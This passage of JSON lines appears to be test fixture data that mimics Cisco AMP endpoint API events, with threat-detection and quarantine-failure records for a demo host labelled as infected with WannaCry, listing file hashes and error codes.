Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 